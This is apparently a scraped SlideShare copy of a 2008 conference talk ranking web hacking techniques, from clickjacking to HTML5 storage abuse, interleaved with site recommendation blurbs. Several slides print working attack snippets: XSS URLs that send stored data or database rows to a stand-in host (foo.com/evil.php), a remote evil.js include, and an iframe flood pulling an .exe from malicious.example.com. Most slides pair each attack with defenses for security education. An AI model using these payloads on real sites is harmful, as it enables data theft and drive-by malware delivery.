SlideShare a Scribd company logo
Top Ten
   Web Hacking Techniques


                                     2008
Jeremiah Grossman
Founder & Chief Technology Officer
Top Ten Web Hacking Techniques (2008)

 Jeremiah Grossman
• WhiteHat Security Founder & CTO
• Technology R&D and industry evangelist
 (InfoWorld's CTO Top 25 for 2007)
• Frequent international conference speaker
• Co-founder of the Web Application Security Consortium
• Co-author: Cross-Site Scripting Attacks
• Former Yahoo! information security officer




                                                            © 2009 WhiteHat, Inc. | Page 2
Top Ten Web Hacking Techniques (2008)

WhiteHat Security
• 200+ enterprise customers
 • Start-ups to Fortune 500
• Flagship offering “WhiteHat Sentinel Service”
 • 1000’s of assessments performed annually
• Recognized leader in website security
 • Quoted hundreds of times by the mainstream press




                                                                   © 2009 WhiteHat, Inc. | Page 3
Top Ten Web Hacking Techniques (2008)




MUST be able to protect against   MUST be able to protect against
HOSTILE WEB USER                  HOSTILE WEB PAGE



                                                     © 2009 WhiteHat, Inc. | Page 4

Recommended for you

Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot

Web Application Security: The Land that Information Security Forgot Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential. Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security". This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures. Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security. During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others. Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.

jeremiah grossman whitehat security black hat 2001
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait

Phishing with Super Bait Jeremiah Grossman, Founder and CTO, WhiteHat Security The use of phishing/cross-site scripting (XSS) hybrid attacks for financial gain is spreading. ItÕs imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. WeÕre all very familiar with each of those issues. Instead, weÕll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks.

jeremiah grossman whitehat security black hat 2005
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective

Various techniques of TLS Redirection / Virtual Host Confusion attacks https://github.com/GrrrDog/TLS-Redirection

Top Ten Web Hacking Techniques (2008)




2008’s
New Web Hacking
Techniques    65 (2006)
                                                                               83 (2007)
http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques-
of-2008.html




                                       70 (2008)                                    © 2009 WhiteHat, Inc. | Page 5
Top Ten Web Hacking Techniques (2008)
CUPS Detection                                                   Firefox cross-domain information theft (simple text strings, some CSV)
CSRFing the uTorrent plugin                                      Firefox 2 and WebKit nightly cross-domain image theft
Clickjacking / Videojacking                                      Browser's Ghost Busters
Bypassing URL AuthC and AuthZ with HTTP Verb Tampering           Exploiting XSS vulnerabilities on cookies
I used to know what you watched, on YouTube                      Breaking Google Gears' Cross-Origin Communication Model
Safari Carpet Bomb                                               Flash Parameter Injection
Flash clipboard Hijack                                           Cross Environment Hopping
Flash Internet Explorer security model bug                       Exploiting Logged Out XSS Vulnerabilities
Frame Injection Fun                                              Exploiting CSRF Protected XSS
Free MacWorld Platinum Pass? Yes in 2008!                        ActiveX Repurposing
Diminutive Worm, 161 byte Web Worm                               Tunneling tcp over http over sql-injection
SNMP XSS Attack                                                  Arbitrary TCP over uploaded pages
Res Timing File Enumeration Without JavaScript in IE7.0          Local DoS on CUPS to a remote exploit via specially-crafted webpage
Stealing Basic Auth with Persistent XSS                          JavaScript Code Flow Manipulation
Smuggling SMTP through open HTTP proxies                         Common localhost dns misconfiguration can lead to quot;same sitequot; scripting
Collecting Lots of Free 'Micro-Deposits'                         Pulling system32 out over blind SQL Injection
Using your browser URL history to estimate gender                Dialog Spoofing - Firefox Basic Authentication
Cross-site File Upload Attacks                                   Skype cross-zone scripting vulnerability
Same Origin Bypassing Using Image Dimensions                     Safari pwns Internet Explorer
HTTP Proxies Bypass Firewalls                                    IE quot;Print Table of Linksquot; Cross-Zone Scripting Vulnerability
Join a Religion Via CSRF                                         A different Opera
Cross-domain leaks of site logins via Authenticated CSS          Abusing HTML 5 Structured Client-side Storage
JavaScript Global Namespace Pollution                            SSID Script Injection
GIFAR                                                            DHCP Script Injection
HTML/CSS Injections - Primitive Malicious Code                   File Download Injection
Hacking Intranets Through Web Interfaces                         Navigation Hijacking (Frame/Tab Injection Attacks)
Cookie Path Traversal                                            UPnP Hacking via Flash
Racing to downgrade users to cookie-less authentication          Total surveillance made easy with VoIP phone
MySQL and SQL Column Truncation Vulnerabilities                  Social Networks Evil Twin Attacks
Building Subversive File Sharing With Client Side Applications   Recursive File Include DoS
Firefox XML injection into parse of remote XML                   Multi-pass filters bypass
                                                                 Session Extending
                                                                 Code Execution via XSS
                                                                 Redirector’s hell
                                                                 Persistent SQL Injection
                                                                 JSON Hijacking with UTF-7
                                                                 SQL Smuggling
                                                                 Abusing PHP Sockets
                                                                 CSRF on Novell GroupWise WebAccess




                                                                                                                © 2009 WhiteHat, Inc. | Page 6
Top Ten Web Hacking Techniques (2008)




Flash Parameter Injection
Flash Parameter Injection introduces a new way to inject values to global parameters in
Flash movies while the movie is embedded in it's original HTML environment. These
injected parameters can grant the attacker full control over the page DOM, as well as
control over other objects within the Flash movie. This can lead to more elaborate




                                                                 10
attacks that take advantage of the interaction between the Flash movie and the HTML
page in which it is embedded.




 By: Yuval Baror, Ayal Yogev, and Adi Sharabani
 http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html
 http://blog.watchfire.com/FPI.pdf




                                                                              © 2009 WhiteHat, Inc. | Page 7
Top Ten Web Hacking Techniques (2008)


How it works
There are several different FPI variants. Most of the variants include tricking the server
into sending back a page where user input is interpreted as Flash parameters. This
allows an attacker to inject malicious global parameters to the Flash movie and exploit
Flash specific vulnerabilities.

ActionScript 2 code reading a global variable




                                                                          © 2009 WhiteHat, Inc. | Page 8

Recommended for you

Hacking the Web
Hacking the WebHacking the Web
Hacking the Web

The document discusses various web application attacks like cross-site scripting, SQL injection, cross-site request forgery, sensitive data exposure, and cookie editing. For each attack, it provides information on threat agents, attack vectors, security weaknesses, impacts, prevalence, detectability, example exploits, and steps to prevent the attack. The overall document serves as an educational guide on common web hacking techniques and how to avoid falling victim to them.

ethical hackingrobert gordon university
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps

XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more. This presentation: 1.Explain how XPC/NSXPC work 2.Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t) 3.Abuse an interesting feature on Catalina allowing to inject an unsigned dylib 4.Show you how to fix that vulnz finally!

macosinformation securityxpc
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012

The document introduces various topics related to web security including an overview of common web application vulnerabilities like SQL injection, cross-site scripting, and cross-site request forgery as well as potential countermeasures. It also provides background on typical web application architecture and outlines the OWASP top 10 list of most critical web application security risks.

web securityxssconfess
Top Ten Web Hacking Techniques (2008)

Passing arguments in an embedded URI




Passing arguments using 'flashvars'




DOM-based Flash parameter injection




                                                    © 2009 WhiteHat, Inc. | Page 9
Top Ten Web Hacking Techniques (2008)
Persistent Flash Parameter Injection




                                                    © 2009 WhiteHat, Inc. | Page 10
Top Ten Web Hacking Techniques (2008)

Defenses

User input must be sanitized according to context before
reflected back to the user. Extreme caution should be
taken when saving user input in Flash cookies.




                                                   © 2009 WhiteHat, Inc. | Page 11
Top Ten Web Hacking Techniques (2008)




ActiveX Repurposing
Multi-staged attack to get code execution on victims who were running




                                                                                       9
a vulnerable and popular SSL-VPN ActiveX control.




 By: Haroon Meer
 http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html
 http://www.sensepost.com/blog/2237.html
 http://www.networkworld.com/news/2008/080708-black-hat-ssl-vpn-security.html




                                                                                        © 2009 WhiteHat, Inc. | Page 12

Recommended for you

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...

Identifying Web Servers: A First-look Into the Future of Web Server Fingerprinting Jeremiah Grossman, Founder & Chairman of WhiteHat Security, Inc. Many diligent security professionals take active steps to limit the amount of system specific information a publicly available system may yield to a remote user. These preventative measures may take the form of modifying service banners, firewalls, web site information, etc. Software utilities such as NMap have given the security community an excellent resource to discover what type of Operating System and version is listening on a particular IP. This process is achieved by mapping subtle, yet, distinguishable nuances unique to each OS. But, this is normally where the fun ends, as NMap does not enable we user's to determine what version of services are listening. This is up to us to guess or to find out through other various exploits. This is where we start our talk, fingerprinting Web Servers. These incredibly diverse and useful widespread services notoriously found listening on port 80 and 443 just waiting to be explored. Many web servers by default will readily give up the type and version of the web server via the "Server" HTTP response header. However, many administrators aware of this fact have become increasingly clever in recent months by removing or altering any and all traces of this telltale information. These countermeasures lead us to the obvious question; could it STILL possible to determine a web servers platform and version even after all known methods of information leakage prevention have been exhausted (either by hack or configuration)? The simple answer is "yes"; it is VERY possible to still identify the web server. But, the even more interesting question is; just how much specific information can we obtain remotely? Are we able to determine? * Supported HTTP Request Methods. * Current Service Pack. * Patch Levels. * Configuarations. * If an Apache Server suffers from a "chunked" vulnerability. Is really possible to determine this specific information using a few simple HTTP requests? Again, the simple answer is yes, the possibility exists. Proof of concept tools and command line examples will be demonstrated throughout the talk to illustrate these new ideas and techniques. Various countermeasures will also be explored to protect your IIS or Apache web server from various fingerprinting techniques. Prerequisites: General understanding of Web Server technology and HTTP.

jeremiah grossman whitehat security black hat 2002
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...

Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack. Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported. In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron. --- Yosuke Hasegawa Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others. OWASP Kansai Chapter Leader, OWASP Japan Board member.

web securityxssjavascript
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage

This document discusses using iframes, postMessage, and localStorage for communication in a sandboxed web application platform. It notes both advantages and disadvantages of iframes, describes how to securely communicate between iframes and different browser tabs or windows using postMessage, and explores strategies and considerations for using localStorage for communication.

Top Ten Web Hacking Techniques (2008)


How it works




                            © 2009 WhiteHat, Inc. | Page 13
Top Ten Web Hacking Techniques (2008)

1. Client with control visits malicious page
2. Page instantiates control and offers an upgrade
3. new-config.txt downloads to c:predictable_locationnew-config.txt
4. Malicious page re-instantiates control with ini file == c:predictable_locationnew-
config.txt [new-config contains arbitrary commands as uninstall string]
5. Exectute the controls uninstall method:
6.The victims machine fires calc.exe &&.




                                                                                © 2009 WhiteHat, Inc. | Page 14
Top Ten Web Hacking Techniques (2008)

Defenses

Website:
ActiveX should make use of Sitelock wherever possible.

Web Browser:
Restrict ActiveX to the maximum degree possible.




                                                  © 2009 WhiteHat, Inc. | Page 15
Top Ten Web Hacking Techniques (2008)




Tunneling TCP over HTTP
over SQL-Injection
Create a TCP circuit through reDuh over squeeza by building the




                                                                         8
server component within SQL Servers CLR subsystem.




By: Glenn Willinson, Marco Slaviero and Haroon Meer
http://www.sensepost.com/research/reDuh/SensePost_2008.tgz




                                                                          © 2009 WhiteHat, Inc. | Page 16

Recommended for you

Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end

My presentation from Framsia. Topics: XSS (reflected, stored, dom-based) CSRF Clickjacking Header based approaches (CSP, X-frame-options) EcmaScript5 HTML5 Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias

framsiasecurityxss
Browser Security
Browser SecurityBrowser Security
Browser Security

This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.

securityhackinghtml5
Web Hacking
Web HackingWeb Hacking
Web Hacking

The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.

Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 17
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 18
Top Ten Web Hacking Techniques (2008)

Defenses

Good network architecture, solid application design,
database hardening.




                                                    © 2009 WhiteHat, Inc. | Page 19
Top Ten Web Hacking Techniques (2008)




Cross-domain leaks of site logins
via Authenticated CSS
Checks the contents of a stylesheet property value across domains.




                                                                                         7
The most reliable technique to determine whether the victim is logged-
in to a given website or not.




 By: Chris Evans and Michal Zalewski
 http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html




                                                                                         © 2009 WhiteHat, Inc. | Page 20

Recommended for you

HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know

Demonstration based session on HTTP headers relevant to security aspect of web applications. Target audience is web developers, and more attention is given to Java language.

webinformation securityweb design
Web Security 101
Web Security 101Web Security 101
Web Security 101

This talk walks through the basics of web security without focussing too much on the particular tools that you choose. The concepts are universal, although most examples will be in Perl. We'll also look at various attack vectors (SQL Injection, XSS, CSRF, and more) and see how you can avoid them. Whether you're an experienced web developer (we all need reminding) or just starting out, this talk can help avoid being the next easy harvest of The Bad Guys.

securityphpinternet
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense

This document discusses various tools from the OWASP project for securing modern web applications, including ESAPI and the Java Encoder for output encoding, the Secure Headers Project for response headers, and CSRFGuard for cross-site request forgery protection. It emphasizes using security features like content security policies, strict transport security, and X-frame options headers to help mitigate risks like cross-site scripting and clickjacking attacks. The document also demonstrates cross-site request forgery vulnerabilities using the OWASP 1-Liner application and how to address them with anti-CSRF tokens.

Top Ten Web Hacking Techniques (2008)


How it works
Perform a cross-domain load of a stylesheet and then reading property values using
standard Javascript APIs. What makes it work on so many sites is that browsers will
load inline style definitions from HTML documents. In addition, stylesheet properties
differ wildly depending on whether a user is logged in or not.

<html><head>
<link rel=quot;stylesheetquot; href=quot;http://home.myspace.com/index.cfm?fuseaction=userquot;/>
<script>
function func() {
var ele = document.getElementById('blah');
alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom'));
}
</script></head>
<body onload=quot;func()quot;>
<div id=quot;blahquot; class=quot;showquot;>
</body>
</html>

                                                                       © 2009 WhiteHat, Inc. | Page 21
Top Ten Web Hacking Techniques (2008)

Defenses


As a Web application, do not store anything sensitive (such as user-
identifying customizations) in stylesheet properties. If you must, make sure
to store the properties in their own CSS file and ensure the URL of that file
unguessable to attackers for a given victim user.




                                                              © 2009 WhiteHat, Inc. | Page 22
Top Ten Web Hacking Techniques (2008)




Abusing HTML 5 Structured
Client-side Storage
HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through
the browser. Attackers could steal or modify sensitive data online or offline. If a web application which
uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an




                                                                                6
attack payload to read or modify the content of known storage keys (session storage, global storage,
local storage or database storage) on the computer’s victim. If the web application loads data or code
from the local storage, could be also quite powerful to inject malicious code that will be executed every
time the web application will request it.




 By: Alberto Trivero
  http://trivero.secdiscover.com/html5whitepaper.pdf




                                                                                  © 2009 WhiteHat, Inc. | Page 23
Top Ten Web Hacking Techniques (2008)


How it works
     Storage Object Enumeration
var ss = quot;quot;;
for(i in window.sessionStorage) {
 ss += i + quot; quot;;
}

var ls = quot;quot;;
for(i = 0; i < localStorage.length; i++) {
 ls += localStorage.key(i) + quot; quot;;
}

Database Object Enumeration
var db = quot;quot;;
for(i in window) {
 if(window[i] == “[object Database]”) {
 db += i + “ “;
 }
}




                                                          © 2009 WhiteHat, Inc. | Page 24

Recommended for you

Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security

This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

webdevsecurityphp
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish

This document summarizes a presentation on Java EE 6 security best practices using the GlassFish application server. It discusses the OWASP Top 10 security risks and provides recommendations for how to address each one when developing applications on the Java EE 6 platform. Specific topics covered include injection, cross-site scripting, authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, failure to restrict URL access, insecure cryptographic storage, insufficient transport layer protection, and unvalidated redirects/forwards.

securityglassfish
Grow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web Apps

This is the first part of the Grow Hack Athens presentation by GrowthRocks, entitled GrowHackAthens: Growth Hacking For Web Apps.

growth hackinggrowth hackermobile apps
Top Ten Web Hacking Techniques (2008)




Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type='table'

SELECT sql FROM sqlite_master WHERE name='table_name'

SELECT sqlite_version()




                                                         © 2009 WhiteHat, Inc. | Page 25
Top Ten Web Hacking Techniques (2008)




   One Shot Attack
http://example.com/page.php?name=<script>document.write('<img
src=quot;http://foo.com/
evil.php?name=' %2B globalStorage[location.hostname].mykey %2B
'quot;>');</script>

http://example.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql
(quot;SELECT * FROM client_tbquot;, [], function(tx, result){ document.write('<img src=quot;http://
foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B 'quot;>'); }); });</script>




                                                                         © 2009 WhiteHat, Inc. | Page 26
Top Ten Web Hacking Techniques (2008)

http://example.com/page.php?name=<script src=http://foo.com/evil.js></
script>




                                                            © 2009 WhiteHat, Inc. | Page 27
Top Ten Web Hacking Techniques (2008)

Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations:
Windows XP
$userApplication DataMacromediaFlash Player#SharedObjects

Windows Vista
$userAppDataRoamingMacromediaFlash Player#SharedObjects

Mac OS X
~/Library/Preferences/Macromedia/Flash Player/#SharedObjects

Linux
/home/$user/.macromedia/Flash_Player/#SharedObjects


                                                                © 2009 WhiteHat, Inc. | Page 28

Recommended for you

ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times

This document discusses ethical hacking. It defines ethical hacking as testing systems for security purposes with permission, compared to cracking which is hacking without permission for malicious reasons. It outlines different types of hackers like script kiddies, white hat hackers who hack legally for security work, grey hat hackers who can help or harm, and black hat hackers who hack criminally. The document advises on security practices like using antiviruses and strong passwords to prevent hacking.

ethical hackinghackingcracking
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation

This document provides an overview of security and hacking. It defines security as protection from harm and defines differences between security and protection. It then discusses what hacking and hackers are, provides a brief history of hacking from the 1960s to present day, and describes different types of hackers like white hat and black hat hackers. The document also outlines the hacking process and some common tools used. It lists some famous hackers and recent news stories about hacking.

Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites

Jeremiah Grossman and T.C. Niedzialkowski presented on the dangers of JavaScript malware exploiting vulnerabilities to hack intranet websites from outside the network. They demonstrated how JavaScript malware can steal browser history, fingerprint servers, and change router passwords by exploiting vulnerabilities like cross-site scripting and cross-site request forgery. The presentation recommended hardening websites by validating input, protecting sensitive functionality, finding vulnerabilities through assessments, and using web application firewalls.

Top Ten Web Hacking Techniques (2008)




A Different Opera
Exploit an XSS in opera:feature scheme leading to code execution by
abusing same origin policy.




By: Stefano Di Paola
http://www.wisec.it/sectou.php?id=49102ef18b7f3
http://aviv.raffon.net/2008/10/30/ADifferentOpera.aspx
http://seclists.org/fulldisclosure/2008/Oct/0401.html

                                                                     5© 2009 WhiteHat, Inc. | Page 29
Top Ten Web Hacking Techniques (2008)


How it works
1) CSRF a user from evilhost to opera:historysearch
•   Pre-existing XSS in opera:historysearch leads to writing in opera:* context.
     SOP matching is evaluated by comparing
           scheme1 + host1 + port1 == scheme2 + host2 + port2

   opera:* considered as:
       opera + null + null

2) Inject IFRAME to opera:config change the email client to arbitrary command
3) Open a window pointing to a quot;mailtoquot; scheme.




                                                                       © 2009 WhiteHat, Inc. | Page 30
Top Ten Web Hacking Techniques (2008)

Defenses

Upgrade to Opera => 9.62




                                        © 2009 WhiteHat, Inc. | Page 31
Top Ten Web Hacking Techniques (2008)




Clickjacking / Videojacking
Think of any button – image, link, form, etc. – on any website – that can appear between
the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg
buttons, CPC advertising banners, Netflix queue.




                                                                              4
Next consider that an attacker can invisibly hover these buttons below the user's mouse,
so that when a user clicks on something they visually see, they're actually clicking on
something the attacker wants them to.




By: Jeremiah Grossman and Robert Hansen
http://www.sectheory.com/clickjacking.htm
http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html
http://blogs.adobe.com/psirt/2008/10/clickjacking_security_advisory.html




                                                                                      © 2009 WhiteHat, Inc. | Page 32

Recommended for you

Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking

This document introduces the concept of ethical hacking. It begins by defining hacking as finding solutions to real-life problems, and clarifies that the original meaning of "hack" was not related to computers. It then discusses how the term entered computer culture at MIT in the 1960s, where hackers were students who solved problems in innovative ways, unlike "tools" who just attended class. The document outlines some traits of good hacks and provides examples. It emphasizes that media misconstrues hackers as criminals, and explains that real hackers have strong ethics and help catch cyber criminals, unlike crackers who hack systems illegally. The rest of the document provides an overview of skills, subjects, and basic concepts needed for ethical hacking.

information securityethical hacking
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session i

The goal of the workshop is to provide a hands-on introduction to key pen-testing tools and concepts that white-hat and black-hat hackers utilize to find and exploit vulnerabilities in real-world embedded devices.

cyber securityhackingembedded device
Hacking ppt
Hacking pptHacking ppt
Hacking ppt

The document discusses ethical hacking and describes hackers. It defines ethical hacking as evaluating a system's security vulnerabilities by attempting to break into computer systems. Ethical hackers possess strong programming and networking skills and detailed hardware/software knowledge. They evaluate systems by determining what intruders can access, what they can do with that information, and if intruder attempts can be detected. The document outlines different types of hackers and classes them as black hats, white hats, gray hats, and ethical hackers based on their motivations and how they use their skills.

Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 33
Top Ten Web Hacking Techniques (2008)

Hover Invisible IFRAMEs
                                     HTML, CSS, and JavaScript may
                                     size, follow the mouse and make
                                     transparent third-party IFRAME
                                     content.




  <iframe
    src=quot;http://victim/page.htmlquot;
    scrolling=quot;noquot;
    frameborder=quot;0quot;
    style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;quot;>
  </iframe>

                                                        © 2009 WhiteHat, Inc. | Page 34
Top Ten Web Hacking Techniques (2008)

What if a Web page could See and Hear you?


       Clickjacking enables corporate
       espionage, government surveillance,
       home user spying, etc. Every computer
       with a webcam and/or a microphone
       becomes a remote monitoring device.




      JavaScript can’t access the webcam or microphone...


                                                         © 2009 WhiteHat, Inc. | Page 35
Top Ten Web Hacking Techniques (2008)




<div style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9quot;>
<embed

      src=quot;vid.swfquot;

      type=quot;application/x-shockwave-flashquot;

      allowfullscreen=quot;falsequot;

      wmode=quot;transparentquot;>
</embed>
</div>


                                                           © 2009 WhiteHat, Inc. | Page 36

Recommended for you

Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types

This document provides an overview of hacking, including its history, definitions, types, famous hackers, reasons for hacking, and advice on security and ethics. Hacking emerged in the 1960s at MIT and refers to attempting to gain unauthorized access to computer systems. It describes hackers as those who exploit weaknesses in computers. Different types of hacking are outlined such as website, network, password, and computer hacking. Advice is given around using strong unique passwords, backing up data, and contacting authorities if hacked. Both advantages like security testing and disadvantages like privacy harm are discussed.

Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"

El documento presenta una introducción a JavaScript y su importancia para el hacking web ético. Explica que JavaScript permite agregar interactividad a páginas web y es útil para hackers éticos para comprender y manipular sitios objetivo. Describe fundamentos como condicionales, bucles, variables, funciones y eventos, y cómo estos pueden usarse para ataques como redireccionar formularios o robar cookies. También promueve un curso virtual gratuito sobre fundamentos de hacking web.

Ruxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenetRuxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenet

This document introduces Proxenet, a hacker-friendly web application proxy designed to be easily extensible through plugins. Proxenet is written entirely in C for high performance. It uses a microkernel approach where a small core handles connections and delegates all other functionality to plugins. Plugins are simple to create, requiring only request and response hook functions. The document demonstrates how Proxenet can be used for man-in-the-middle attacks by modifying HTTP traffic using plugins during active directory poisoning attacks on internal networks.

Top Ten Web Hacking Techniques (2008)


Defenses
Frame-busting code
<script>
if (window.top !== window.self) { setTimeout(function()
{document.body.innerHTML='';},1);window.self.onload=function(evt)
{document.body.innerHTML='';};}
</script>

/* IE 8 Only */
X-FRAME-OPTIONS: (DENY | SAMEORIGIN)


                         • Upgrade to Flash Player 10
                         • NoScript w/ ClearClick



                                                                      © 2009 WhiteHat, Inc. | Page 37
Top Ten Web Hacking Techniques (2008)




Safari Carpet Bomb
The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the
user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and
malware. This vulnerability has the distinction of bringing the term quot;blended threatquot; into the




                                                                                          3
security vernacular because, if you are able to litter user's machines with arbitrary files, you can
further the impact and affect other applications that trust content on the local filesystem.




 By: Nitesh Dhanjani
  http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html
  http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html
  http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx




                                                                                       © 2009 WhiteHat, Inc. | Page 38
Top Ten Web Hacking Techniques (2008)


How it works
When the Safari browser is served a file with a content-type that cannot be rendered
by the browser, it automatically downloads it do the default download location
(desktop on Windows, Downloads directory on OSX) without notifying or asking the
user. This allows a malicious website to litter the user's Desktop or download
directory with arbitrary files, including malware.

<HTML>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
...
...
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
</HTML>




                                                                       © 2009 WhiteHat, Inc. | Page 39
